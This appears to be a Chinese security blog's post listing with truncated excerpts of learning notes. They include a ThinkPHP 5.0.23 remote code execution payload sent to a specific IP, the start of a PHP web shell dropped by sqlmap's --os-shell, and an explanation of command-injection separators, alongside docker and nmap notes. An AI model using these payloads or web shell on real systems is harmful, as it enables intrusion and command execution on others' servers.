- 博客(7)
- 收藏
- 关注
RSS订阅
1原创 复现ThinkPHP5 5.0.23远程代码执行漏洞
访问/index.php?s=captcha页面,出现报错执行whoamihttp://159.75.16.25:8089/index.php?s=captcha(POST)_method=__construct&filter[]=system&method=get&get[]=whoami查看文件目录_method=__construct&filter[]=system&method=get&server[REQUEST...
2022-04-13 22:01:41
3404
原创 sqlmap挂马命令
--os-shell写了两个马一个是上传功能的马一个是通过上传的马进行shell的上传。(tmpukjhb.php上传了一个tmpbezal.php的文件,tmpbezal.php这个文件可以用来执行系统命令,并且将结果返回出来)Tmpbezal.php1 <?php 2 $c=$_REQUEST["cmd"]; 3 @set_time_limit(0); 4 @ignore_user_abort(1); 5 @ini_set('max_execution_tim..
2022-04-13 21:57:18
4014
原创 命令执行漏洞的漏洞原理
命令执行直接调用操作系统命令。其原理是,在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行漏洞。command1&command2 两个命令同时执行command1&&command2 只有前面命令执行成功,后面命令才继续执行command1;command2 不管前面命令执行成功没有,后面的命...
2022-04-13 21:26:16
1961
原创 docker常用命令(学习自用)
docker pull xxxxxdocker images //查看本地镜像仓库镜像docker run -d -p80:80 xxx //启动镜像,将镜像内的80端口映射到本地的dockerexec-it/bin/bashxxx//进入容器,使用进程前三位id即可docker cp 2.txt e4d:/var/www/html/ //拷贝宿主机当前目录1.txt到容器中;docker commit e4d hellword:1.0 //将更改后的容器保存为新...
2022-04-13 21:22:02
3384
转载 nmap相关命令(学习自用)
简单解释相关参数:-sS:使用SYN方式扫描,默认用的是-sT方式,即TCP方式,需要完成完整的三次握手,比较费时,SYN就比较快一些了;-Pn: 禁用PING检测,这样速度快,并且可以防止有些主机无法ping通而被漏掉不扫描;–open: 只输出检测状态为open的端口,即开放的端口;–min-hostgroup 4:调整并行扫描组的大小;–min-parallelism 1024:调整探测报文的并行度;-T4:总共有T0-T5,T4折中等级-sn #进行ping探测,不进行端
2022-04-13 21:20:58
240
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人